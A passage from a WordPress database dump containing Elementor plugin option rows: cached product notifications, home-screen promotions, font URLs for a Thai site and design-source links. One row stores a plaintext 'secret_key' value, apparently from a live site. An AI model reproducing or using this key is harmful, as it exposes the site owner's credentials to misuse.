Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.39-v4-blog\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"youtube-3.30\",\"title\":\"YouTube Element\",\"description\":\"The new YouTube Element is purpose-built to support V4 capabilities with faster rendering, better performance, and familiar controls like autoplay, loop, mute, and aspect ratio.\",\"topic\":\"Editor V4 Alpha\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/youtube-3.30.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.39-v4-blog\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"host-google-cloud\",\"title\":\"Deliver fast, secure websites at scale - free migration included!\",\"description\":\"Host your site on Elementor\\u2019s infrastructure - built for speed, security, and scale. Powered by Google Cloud, with free migration and 24\\/7 expert support.\",\"topic\":\"Host\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/host-google-cloud.png\",\"chipTags\":[\"Cloud Hosting\"],\"link\":\"https:\\/\\/go.elementor.com\\/elementor-host-google-cloud\",\"readMoreText\":\"Read More\"},{\"id\":\"send-notification-june\",\"title\":\"A whole new onboarding experience\",\"description\":\"Try the new onboarding now: Launch abandoned cart recovery, welcome flows & more in minutes. No setup stress\\u2014just smarter automation from day one.\",\"topic\":\"Send: Email & SMS built for WooCommerce\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/send-june.png\",\"chipTags\":[\"New Features\"],\"cta\":\"Check Out\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/New_June\",\"conditions\":[[{\"type\":\"plugin\",\"operator\":\"!=\",\"plugin\":\"send-app\\/send-app.php\"}]]},{\"id\":\"cloud-templates-3.29\",\"title\":\"Your Templates, available everywhere\",\"description\":\"Store sections, containers, and full pages in the cloud\\u2014making them accessible across all your Pro-connected sites. Style once, reuse anywhere!\",\"topic\":\"Elementor Pro 3.29\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/cloud-templates.png\",\"chipPlan\":\"Pro\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.29-cloud-templates-blog\\/\",\"readMoreText\":\"Learn More\",\"conditions\":[[{\"type\":\"plugin\",\"plugin\":\"elementor-pro\\/elementor-pro.php\"}]]},{\"id\":\"cloud-templates-3.29\",\"title\":\"Your Templates, available everywhere\",\"description\":\"Store sections, containers, and full pages in the cloud\\u2014making them accessible across all your Pro-connected sites. Style once, reuse anywhere!\",\"topic\":\"Elementor Pro 3.29\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/cloud-templates.png\",\"chipTags\":[\"New Feature\"],\"cta\":\"Upgrade\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.29-cloud-templates\\/\"},{\"id\":\"classes-3.29\",\"title\":\"Classes: Style Once, Apply Everywhere\",\"description\":\"Create Classes to define styling patterns once and apply them across your entire site with a single click. Add States for stunning hover and focus effects\\u2014no coding needed!\",\"topic\":\"Editor V4 Alpha\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/v4-classes.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.29-editor-v4\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"style-tab-3.29\",\"title\":\"Consistent Styling Everywhere\",\"description\":\"Every V4 element shares the same styling capabilities in the same logical order and location. Plus, we\'ve streamlined from 3 tabs to just 2\\u2014content in one, styling in the other!\",\"topic\":\"Editor V4 Alpha\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/v4-style-tab.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.29-editor-v4\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"responsive-3.29\",\"title\":\"Fully Responsive Design\",\"description\":\"With Editor V4, every single style property can be customized per device. Complete creative control for desktop, tablet, and mobile!\",\"topic\":\"Editor V4 Alpha\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/v4-responsive.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.29-editor-v4\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"performance-3.29\",\"title\":\"Blazing fast performance\",\"description\":\"In Editor V4, each element uses one clean div instead of multiple nested divs like in the current version\\u2014your sites will load lightning-fast with cleaner code!\",\"topic\":\"Editor V4 Alpha\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/v4-performance.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.29-editor-v4\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"migration-host\",\"title\":\"Move to Better Cloud Hosting, Painlessly\",\"description\":\"Migrate your Elementor website for free to a home that\\u2019s perfect for it, in minutes, with a combination of\\u2028advanced automation and free expert support\",\"topic\":\"Host\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/migration-host.png\",\"chipTags\":[\"Cloud Hosting\"],\"link\":\"https:\\/\\/go.elementor.com\\/hosting-free-migration\",\"readMoreText\":\"Learn More\",\"cta\":\"Migrate for free\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/hosting-free-migration\"},{\"id\":\"ai-isolate-object\",\"title\":\"Sharper product images, instantly\",\"description\":\"Remove distractions and reframe your shots with the new Isolate Object tool powered by Elementor AI \\u2014 perfect for a polished, uniform Woo storefront.\",\"topic\":\"Elementor AI\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/isolate-object-ai.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/Isolateobjectblog\",\"readMoreText\":\"Learn More\",\"conditions\":[[{\"type\":\"introduction_meta\",\"meta\":\"ai_get_started\"}]],\"cta\":\"Start Free Trial\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/Isolateobjectblog\"},{\"id\":\"ai-isolate-object\",\"title\":\"Sharper product images, instantly\",\"description\":\"Remove distractions and reframe your shots with the new Isolate Object tool powered by Elementor AI \\u2014 perfect for a polished, uniform Woo storefront.\",\"topic\":\"Elementor AI\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/isolate-object-ai.png\",\"chipTags\":[\"New Feature\"],\"cta\":\"Start Free Trial\",\"link\":\"https:\\/\\/go.elementor.com\\/Isolateobjectblog\",\"readMoreText\":\"Learn More\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/Isolateobjectblog\"},{\"id\":\"hello-biz-contact\",\"title\":\"New Contact Widget, Visual Layout Presets & more\",\"description\":\"Hello Biz just got an update! Explore the new Contact Widget, Visual Layout Presets, Form Submissions integration, and fresh new kits.\",\"topic\":\"Hello Biz\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/hello-biz-contact.png\",\"chipTags\":[\"New Features\"],\"link\":\"https:\\/\\/go.elementor.com\\/hello-biz-updates\",\"readMoreText\":\"Learn More\"},{\"id\":\"ai-site-planner-colors\",\"title\":\"Style Your Wireframe, Speed Up Your Store Build\",\"description\":\"Site Planner now lets you style your wireframe with fonts and colors - instantly visualizing your site\\u2019s look and feel. Plus, it predesigns pages for WooCommerce like Cart and Checkout, so you can dive straight into customizations\",\"topic\":\"Elementor AI\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/site-planner-colors.png\",\"chipTags\":[\"New Feature\"],\"link\":\"http:\\/\\/www.elementor.com\\/ai-site-planner\",\"readMoreText\":\"Learn More\"},{\"id\":\"ally-notification\",\"title\":\"Just released! Ally - a new plugin for web accessibility & usability\",\"description\":\"Ally simplifies the complexities of making your website more accessible. With new regulations here and coming, making your website more usable and inclusive is no longer just an option, but a must.\",\"topic\":\"Ally by Elementor\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/ally-notification.png\",\"chipTags\":[\"New plugin\"],\"cta\":\"Get it free\",\"ctaLink\":\"https:\\/\\/wordpress.org\\/plugins\\/pojo-accessibility\\/\",\"conditions\":[[{\"type\":\"plugin\",\"operator\":\"!=\",\"plugin\":\"pojo-accessibility\\/pojo-accessibility.php\"}]]},{\"id\":\"ai-site-planner\",\"title\":\"Instant Sitemaps & Wireframes\",\"description\":\"Get your website plan in minutes with AI Site Planner. Describe your desired site and AI will generate a sitemap, brief and wireframe populated with initial content, ready for you to customize.\",\"topic\":\"Elementor AI\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/aI-site-planner.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/ai-notification-site-planner\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"grid-span-3.27\",\"title\":\"Design Grid layouts that fit your exact vision\",\"description\":\"Advanced column and row span controls give you the power to design Grid Container layouts that fit your exact vision.\",\"topic\":\"Elementor 3.27\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/grid-span-3.27.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.27-grid-span-blog\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"local-fonts-3.27\",\"title\":\"Load Google Fonts safer and faster\",\"description\":\"Once enabled, Google Fonts are served directly from your server, streamlining the loading process and enhancing security.\",\"topic\":\"Elementor 3.27\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/local-google-fonts-3.27.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.27-local-fonts-blog\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"video-shorts-3.27\",\"title\":\"Showcase short-form, vertical videos\",\"description\":\"The Video widget now supports YouTube Shorts in a vertical 9:16 ratio, the go-to format for engaging audiences.\",\"topic\":\"Elementor 3.27\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/video-shorts-3.27.png\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.27-video-shorts-blog\\/\",\"readMoreText\":\"Learn More\"},{\"id\":\"dynamic-off-canvas-3.26\",\"title\":\"Dynamic Off-Canvas for Loop Grids\",\"description\":\"Create richer, more interactive designs by linking Dynamic Content to the Off Canvas widget, delivering seamless user experiences.\",\"topic\":\"Elementor Pro 3.26\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/off-canvas-loop-grids.png\",\"chipPlan\":\"Pro\",\"chipTags\":[\"New Feature\"],\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.26-blog\\/\",\"readMoreText\":\"Learn More\",\"conditions\":[[{\"type\":\"plugin\",\"plugin\":\"elementor-pro\\/elementor-pro.php\"}]]},{\"id\":\"dynamic-off-canvas-3.26\",\"title\":\"Dynamic Off-Canvas for Loop Grids\",\"description\":\"Create richer, more interactive designs by linking Dynamic Content to the Off Canvas widget, delivering seamless user experiences.\",\"topic\":\"Elementor Pro 3.26\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/off-canvas-loop-grids.png\",\"chipTags\":[\"New Feature\"],\"cta\":\"Upgrade\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/go-pro-notification-3.26-loop-off-canvas\\/\"},{\"id\":\"image-optimizer-3.19\",\"title\":\"Effortlessly optimize images for a stunning, high-speed website with the Image Optimizer plugin.\",\"description\":\"Image Optimizer perfectly balances between image quality and performance to boost your website.  Resize, compress, and convert images to WebP, for faster loading times and and better user experience.\",\"topic\":\"Image Optimizer Plugin by Elementor\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/image-optimizer-3.19.png\",\"chipTags\":[\"New plugin\"],\"cta\":\"Get the Image Optimizer\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/io-notification-wp-dash-learn-more\\/\",\"conditions\":[[{\"type\":\"plugin\",\"operator\":\"!=\",\"plugin\":\"image-optimization\\/image-optimization.php\"}]]},{\"id\":\"5-star-rating-prompt\",\"title\":\"Love the New Features? Let Us Know with 5 Stars!\",\"description\":\"Help spread the word by telling the world what you love about Elementor.\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/5-star-rating-prompt.png\",\"cta\":\"Leave a Review\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/wp-dash-notification-five-stars\\/\"},{\"id\":\"site-mailer-introducing\",\"title\":\"Introducing Site Mailer\",\"description\":\"Keep your WordPress emails out of the spam folder with improved deliverability and an easy setup\\u2014no need for an SMTP plugin or complicated configurations.\",\"topic\":\"Site Mailer Plugin by Elementor\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/notifications\\/v1\\/images\\/Site-mailer.png\",\"chipTags\":[\"New plugin\"],\"cta\":\"Start Free Trial\",\"ctaLink\":\"https:\\/\\/go.elementor.com\\/sm-wp-dash-whatsnew\\/\",\"conditions\":[[{\"type\":\"plugin\",\"operator\":\"!=\",\"plugin\":\"site-mailer\\/site-mailer.php\"}]]}]\";}','off'),
(74067,'_elementor_home_screen_data','a:2:{s:7:\"timeout\";i:1752664972;s:5:\"value\";s:10885:\"{\"top_with_licences\":[{\"license\":[\"free\"],\"title_small\":\"Hi!\",\"title\":\"Unleash your imagination with Elementor\",\"description\":\"Start building your website with Elementor\'s no code drag & drop editor.\",\"button_create_page_title\":\"Create a Page\",\"button_watch_title\":\"Watch a guide\",\"button_watch_url\":\"https:\\/\\/www.youtube.com\\/watch?v=le72grP_Q6k&t=1s\",\"youtube_embed_id\":\"le72grP_Q6k?si=g2akyWNODL6usu6u\"},{\"license\":[\"pro\"],\"title_small\":\"Hi!\",\"title\":\"Unleash your imagination with Elementor\",\"description\":\"Now you\'ve got all the tools to start creating professional, high-performing websites - and that journey begins by creating your first page.\",\"button_create_page_title\":\"Create a Page\",\"button_watch_title\":\"Watch a guide\",\"button_watch_url\":\"https:\\/\\/www.youtube.com\\/watch?v=QdkDGrS8ZZs\",\"youtube_embed_id\":\"QdkDGrS8ZZs?si=s_VjZCQR6Fh1jgB5\"}],\"get_started\":[{\"license\":[\"free\"],\"header\":{\"title\":\"Jumpstart your web-creation\",\"description\":\"These quick actions will get your site airborne with a customized design.\"},\"repeater\":[{\"title\":\"Site Settings\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-settings.svg\"},{\"title\":\"Site Logo\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"tab_id\":\"settings-site-identity\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-logo.svg\"},{\"title\":\"Global Colors\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"tab_id\":\"global-colors\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/global-colors.svg\"},{\"title\":\"Global Fonts\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"tab_id\":\"global-typography\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/global-fonts.svg\"},{\"title\":\"Theme Builder\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor-app\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/theme-builder.svg\"},{\"title\":\"Popups\",\"title_small\":\"Customize\",\"url\":\"edit.php?post_type=elementor_library&page=popup_templates\",\"is_relative_url\":true,\"title_small_color\":\"text.tertiary\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/popups.svg\"},{\"title\":\"Custom Icons\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor_custom_icons\",\"is_relative_url\":false,\"title_small_color\":\"text.tertiary\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/custom-icons.svg\"},{\"title\":\"Custom Fonts\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor_custom_fonts\",\"is_relative_url\":true,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/custom-fonts.svg\",\"title_small_color\":\"text.tertiary\"}]},{\"license\":[\"pro\"],\"header\":{\"title\":\"Jumpstart your web-creation\",\"description\":\"These quick actions will get your site airborne with a customized design.\"},\"repeater\":[{\"title\":\"Site Settings\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-settings.svg\"},{\"title\":\"Site Logo\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"tab_id\":\"settings-site-identity\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-logo.svg\"},{\"title\":\"Global Colors\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"tab_id\":\"global-colors\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/global-colors.svg\"},{\"title\":\"Global Fonts\",\"title_small\":\"Customize\",\"url\":\"\",\"is_relative_url\":false,\"tab_id\":\"global-typography\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/global-fonts.svg\"},{\"title\":\"Theme Builder\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor-app\",\"is_relative_url\":false,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/theme-builder.svg\"},{\"title\":\"Popups\",\"title_small\":\"Customize\",\"url\":\"edit.php?post_type=elementor_library&tabs_group=popup&elementor_library_type=popup\",\"is_relative_url\":true,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/popups.svg\"},{\"title\":\"Custom Icons\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor_custom_icons\",\"is_relative_url\":false,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/custom-icons.svg\"},{\"title\":\"Custom Fonts\",\"title_small\":\"Customize\",\"url\":\"admin.php?page=elementor_custom_fonts\",\"is_relative_url\":true,\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/custom-fonts.svg\"}]}],\"add_ons\":{\"header\":{\"title\":\"Expand your design toolkit\",\"description\":\"These plugins, add-ons, and tools, have been selected to streamline your workflow and maximize your creativity.\"},\"repeater\":[{\"file_path\":\"send-app\\/send-app.php\",\"title\":\"Send \\u2013 Marketing Automation\",\"url\":\"\",\"description\":\"Supercharge your WooCommerce store with Send\\u2014an all-in-one toolkit for emails, popups & more. Built for WordPress. No plugins, no hassle.\",\"button_label\":\"Install\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/send-logo.svg\",\"type\":\"wporg\"},{\"file_path\":\"site-mailer\\/site-mailer.php\",\"title\":\"Site Mailer\",\"url\":\"\",\"description\":\"Keep your WordPress emails out of the spam folder with improved deliverability and an easy setup\\u2014no need for an SMTP plugin or complicated configurations.\",\"button_label\":\"Install\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/site-mailer.svg\",\"type\":\"wporg\"},{\"file_path\":\"image-optimization\\/image-optimization.php\",\"title\":\"Image Optimizer\",\"url\":\"https:\\/\\/go.elementor.com\\/wp-dash-apps-author-uri-elementor-io\\/\",\"description\":\"Check out this incredibly useful plugin that will compress and optimize your images, giving you leaner, faster websites.\",\"button_label\":\"Install\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/image-optimizer.svg\",\"type\":\"wporg\"},{\"title\":\"Elementor AI\",\"url\":\"https:\\/\\/go.elementor.com\\/wp-dash-apps-author-uri-elementor-ai\\/\",\"description\":\"Boost creativity with Elementor AI. Craft & enhance copy, create custom CSS & Code, and generate images to elevate your website.\",\"button_label\":\"Let\'s go\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/elementor.svg\",\"type\":\"link\",\"condition\":{\"key\":\"introduction_meta\",\"value\":\"ai_get_started\"}}],\"footer\":{\"label\":\"Explore more add-ons\",\"file_path\":\"wp-admin\\/admin.php?page=elementor-apps\"}},\"sidebar_upgrade\":[{\"license\":[\"free\"],\"show\":\"true\",\"header\":{\"title\":\"Bring your vision to life\",\"description\":\"Get complete design flexibility for your website with Elementor Pro\\u2019s advanced tools and premium features.\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-crown.svg\"},\"cta\":{\"label\":\"Upgrade Now\",\"url\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-upgrade\\/\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-crown.svg\"},\"repeater\":[{\"title\":\"Popup Builder\"},{\"title\":\"Custom Code & CSS\"},{\"title\":\"E-commerce Features\"},{\"title\":\"Collaborative Notes\"},{\"title\":\"Form Submission\"},{\"title\":\"Form Integrations\"},{\"title\":\"Custom Attributes\"},{\"title\":\"Role Manager\"}]},{\"license\":[\"pro\"],\"show\":\"false\",\"header\":{\"title\":\"Bring your vision to life\",\"description\":\"Get complete design flexibility for your website with Elementor Pro\\u2019s advanced tools and premium features.\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-crown.svg\"},\"cta\":{\"label\":\"Upgrade Now\",\"url\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-upgrade\\/\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-crown.svg\"},\"repeater\":[{\"title\":\"Popup Builder\"},{\"title\":\"Custom Code & CSS\"},{\"title\":\"E-commerce Features\"},{\"title\":\"Collaborative Notes\"},{\"title\":\"Form Submission\"},{\"title\":\"Form Integrations\"},{\"title\":\"Custom Attributes\"},{\"title\":\"Role Manager\"}]}],\"sidebar_promotion_variants\":[{\"license\":[\"essential\"],\"is_enabled\":\"true\",\"type\":\"banner\",\"data\":{\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/essential-upgrade.svg\",\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-advanced-home-sidebar-upgrade\\/\"}},{\"license\":[\"free\"],\"is_enabled\":\"true\",\"type\":\"banner\",\"data\":{\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/upgrade-free.svg\",\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-upgrade\\/\"}},{\"license\":[\"expired\"],\"is_enabled\":\"true\",\"type\":\"banner\",\"data\":{\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/upgrade-free.svg\",\"link\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-expired\\/\"}},{\"license\":[\"free\"],\"is_enabled\":\"false\",\"type\":\"default\",\"data\":{\"header\":{\"title\":\"Bring your vision to life\",\"description\":\"Get complete design flexibility for your website with Elementor Pro\\u2019s advanced tools and premium features.\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/update-sidebar.svg\"},\"cta\":{\"label\":\"Upgrade Now\",\"url\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-upgrade\\/\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-crown.svg\"},\"repeater\":[{\"title\":\"Popup Builder\"},{\"title\":\"Custom Code & CSS\"},{\"title\":\"E-commerce Features\"},{\"title\":\"Collaborative Notes\"},{\"title\":\"Form Submission\"},{\"title\":\"Form Integrations\"},{\"title\":\"Custom Attributes\"},{\"title\":\"Role Manager\"}]}},{\"license\":[\"pro\"],\"is_enabled\":\"false\",\"type\":\"default\",\"data\":{\"header\":{\"title\":\"Bring your vision to life\",\"description\":\"Get complete design flexibility for your website with Elementor Pro\\u2019s advanced tools and premium features.\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/update-sidebar.svg\"},\"cta\":{\"label\":\"Upgrade Now\",\"url\":\"https:\\/\\/go.elementor.com\\/go-pro-home-sidebar-upgrade\\/\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-crown.svg\"},\"repeater\":[{\"title\":\"Popup Builder\"},{\"title\":\"Custom Code & CSS\"},{\"title\":\"E-commerce Features\"},{\"title\":\"Collaborative Notes\"},{\"title\":\"Form Submission\"},{\"title\":\"Form Integrations\"},{\"title\":\"Custom Attributes\"},{\"title\":\"Role Manager\"}]}}],\"external_links\":[{\"label\":\"Help Center\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-question-mark.svg\",\"url\":\"https:\\/\\/elementor.com\\/help\\/\"},{\"label\":\"Youtube\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-youtube.svg\",\"url\":\"https:\\/\\/www.youtube.com\\/@Elementor\"},{\"label\":\"Facebook Community\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-community.svg\",\"url\":\"https:\\/\\/www.facebook.com\\/groups\\/Elementors\"},{\"label\":\"Blog\",\"image\":\"https:\\/\\/assets.elementor.com\\/home-screen\\/v1\\/images\\/icon-academic-hat.svg\",\"url\":\"https:\\/\\/elementor.com\\/blog\\/\"}]}\";}','off'),
(74068,'e_editor_counter','12','auto'),
(74069,'_elementor_free_to_pro_upsell','a:2:{s:7:\"timeout\";i:1752665128;s:5:\"value\";s:593:\"[{\"id\":\"animated_headline\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/animated_headline.jpg\"},{\"id\":\"video_playlist\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/video_playlist.jpg\"},{\"id\":\"cta\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/cta.jpg\"},{\"id\":\"testimonial_widget\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/testimonial_widget.jpg\"},{\"id\":\"image_carousel\",\"imageSrc\":\"https:\\/\\/assets.elementor.com\\/free-to-pro-upsell\\/v1\\/images\\/image_carousel.jpg\"}]\";}','off'),
(74071,'elementor_safe_mode_allowed_plugins','a:1:{s:9:\"elementor\";s:23:\"elementor/elementor.php\";}','auto'),
(74072,'elementor_safe_mode_created_mu_dir','1','auto'),
(74073,'_elementor_local_google_fonts','a:2:{s:6:\"roboto\";a:2:{s:3:\"url\";s:82:\"http://pakhaeng.ssk.in.th/wp-content/uploads/elementor/google-fonts/css/roboto.css\";s:7:\"version\";i:1751354267;}s:10:\"robotoslab\";a:2:{s:3:\"url\";s:86:\"http://pakhaeng.ssk.in.th/wp-content/uploads/elementor/google-fonts/css/robotoslab.css\";s:7:\"version\";i:1751354288;}}','auto'),
(74076,'enabled_elementor_scripts','a:4:{s:11:\"enabled_ads\";s:0:\"\";s:21:\"enabled_custom_player\";s:0:\"\";s:17:\"enabled_instafeed\";s:0:\"\";s:26:\"enabled_docs_custom_viewer\";s:0:\"\";}','auto'),
(74078,'secret_key','>?MQRu]9!>bv;]!eZA[vrsFw@F)7}~Vm(ml@Ua|`[k)Oe-%Fd?!w~7)~8iO}RV!t','off'),
(74080,'elementor_source_data','[{\"id\":\"c61d3c570e064028e26dd92cfff371f5_eb_elementor\",\"source\":{\"name\":\"GoogleDocs\",\"url\":\"https:\\/\\/docs.google.com\\/spreadsheets\\/d\\/1Z4focaRNpQBLiyIorbOdzccfYfzwwXlp\\/edit?gid=1698444854#gid=1698444854\",\"count\":1}},{\"id\":\"612042f982c83ed12c93267b776eb4d0_eb_elementor\",\"source\":{\"name\":\"unknown\",\"url\":\"\",\"count\":1}},{\"id\":\"d81d7cf0d8b786f68495dd5fea530a60_eb_elementor\",\"source\":{\"name\":\"Canva\",\"url\":\"https:\\/\\/www.canva.com\\/design\\/DAGsFHWqrOk\\/eCZISZCLZjZV8cpVDnNIUA\\/view\",\"count\":1}},{\"id\":\"c026ae9215f893e5854261e79ba172f8_eb_elementor\",\"source\":{\"name\":\"Canva\",\"url\":\"https:\\/\\/www.canva.com\\/design\\/DAGsFHWqrOk\\/eCZISZCLZjZV8cpVDnNIUA\\/view\",\"count\":1}},{\"id\":\"f720cb19eca049da3265fbc9f5636219_eb_elementor\",\"source\":{\"name\":\"Canva\",\"url\":\"https:\\/\\/www.canva.com\\/design\\/DAGsEine2O0\\/Q6Wb_uxvDbumPForlKtMkQ\\/view\",\"count\":1}},{\"id\":\"dd5824a99a1e48da6a0f92038aa768a0_eb_elementor\",\"source\":{\"name\":\"unknown\",\"url\":\"\",\"count\":1}}]','auto'),
(74083,'_elementor_element_cache_unique_id','eb4e8cc58fcce872f13f4a2bcebcb159','auto'),
